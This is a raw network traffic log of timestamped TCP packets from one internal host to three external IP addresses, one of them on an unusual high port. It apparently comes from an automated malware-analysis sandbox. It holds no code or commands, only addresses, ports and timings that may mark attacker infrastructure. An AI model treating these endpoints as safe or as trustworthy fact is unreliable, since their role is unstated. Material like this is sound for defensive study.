                                                                                                  Oct 22, 2024 09:40:36.573498964 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.573508024 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.573514938 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.573555946 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.573869944 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.573915005 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.573920012 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.573961973 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.573966980 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.574091911 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.574225903 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.574276924 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.575973034 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.576030970 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.691274881 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.691373110 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.691483974 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.691493034 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.691716909 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.691723108 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.691742897 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.691760063 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.691787958 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.691796064 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.691838980 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.691843987 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.691884995 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.692234039 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.692276955 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.692298889 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.692341089 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.692344904 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.692389011 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.808676958 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.808970928 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.809042931 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.809042931 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.809065104 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.809160948 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.809298038 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.809319019 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.809361935 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.809648037 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.809696913 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.809781075 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.809833050 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.809875011 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.809920073 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.809958935 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.810003042 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.810470104 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.810517073 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.810581923 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.810630083 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.810684919 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.810734034 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.926496983 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.926594019 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.926618099 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.926660061 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.927819967 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.928347111 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.928353071 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.928400993 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.928924084 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.928977013 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.929012060 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.929054976 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.929091930 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.929136038 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.929491997 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.929552078 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.929603100 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.929661989 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:36.929702997 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:36.929749012 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.044348001 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.044414997 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.045121908 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.045180082 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.045537949 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.045587063 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.045599937 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.045655012 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.091645956 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.091702938 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.162862062 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.162966013 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.163639069 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.163710117 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.163736105 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.163789988 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.209321976 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.209393978 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.279505014 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.279575109 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.280581951 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.280643940 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.280699015 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.280750036 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.281354904 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.281415939 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.327028990 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.327105045 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.397984028 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.398072004 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.398344040 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.398405075 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.398921967 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.398988008 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.444799900 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.444873095 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.444907904 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.444963932 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.515278101 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.515362024 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.516539097 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.516604900 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.516633987 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.516694069 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.562870026 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.562939882 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.632929087 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.633003950 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.633919001 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.633982897 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.634708881 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.634785891 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.634854078 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.634907007 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.680241108 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.680304050 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.727966070 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.728063107 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.751909971 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.751998901 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.752024889 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.752095938 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.752578020 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.752645969 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.797709942 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.797795057 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.845526934 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.845616102 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.868566036 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.868644953 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.869404078 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.869474888 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.869568110 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.869641066 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.870374918 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.870436907 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.963150978 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.963253021 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.963277102 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.963309050 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.963356972 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.963426113 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.987180948 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.987198114 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.987226009 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.987263918 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.987294912 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.987308979 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.987360954 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.104388952 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.104419947 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.104487896 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.104520082 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.104540110 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.104650021 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.154984951 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.155064106 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.155102015 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.155112982 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.155139923 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.155158043 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.222371101 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.222448111 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.222464085 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.222472906 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.222503901 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.222523928 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.316055059 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.316086054 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.316220045 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.316220045 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.316252947 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.316309929 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.340552092 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.340615034 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.340631008 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.340662003 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.340683937 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.340709925 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.457541943 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.457612991 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.457649946 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.457679987 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.457699060 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.457722902 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.507829905 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.507865906 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.507998943 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.507998943 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.508029938 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.508074999 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.575686932 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.575747967 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.575794935 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.575850964 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.575869083 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.576014996 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.626169920 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.626240015 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.626276970 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.626287937 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.626324892 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.626348019 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.693239927 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.693272114 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.693315029 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.693324089 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.693353891 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.693365097 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.743623972 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.743695974 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.743730068 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.743752003 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.743768930 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.743798971 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.810981989 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.811012030 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.811058044 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.811077118 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.811093092 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.811115980 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.861699104 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.861769915 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.861800909 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.861831903 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.861854076 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.861910105 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.928294897 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.928324938 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.928388119 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.928422928 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.928442955 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.928468943 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.979160070 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.979228020 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.979374886 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.979408026 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.979461908 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.045546055 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:39.045614004 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:39.045727968 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.045727968 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.045761108 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:39.045811892 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.045849085 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:39.046003103 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:39.046035051 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.046035051 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.046071053 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:39.046102047 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.046127081 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:41.199649096 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:41.205008030 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:41.205089092 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:41.209614992 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:41.214958906 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:42.235986948 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:42.309015989 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:42.446870089 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:42.459894896 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:42.465276957 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:42.465436935 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:42.470824003 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:42.999722958 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.002250910 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:43.010740042 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.019732952 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.022878885 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:43.028146029 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.028214931 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:43.031433105 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:43.035705090 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:40:43.036686897 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.041032076 CEST8049893178.237.33.50192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.041095972 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:40:43.041161060 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:40:43.046680927 CEST8049893178.237.33.50192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.105789900 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:43.893595934 CEST8049893178.237.33.50192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.893685102 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:40:43.917139053 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:43.965826035 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.046032906 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.230803967 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:44.256479979 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.261075974 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:44.266418934 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.266585112 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:44.271913052 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.608170033 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.608218908 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.608232021 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.608246088 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.608261108 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:44.608288050 CEST4989251525192.168.2.6143.244.46.150
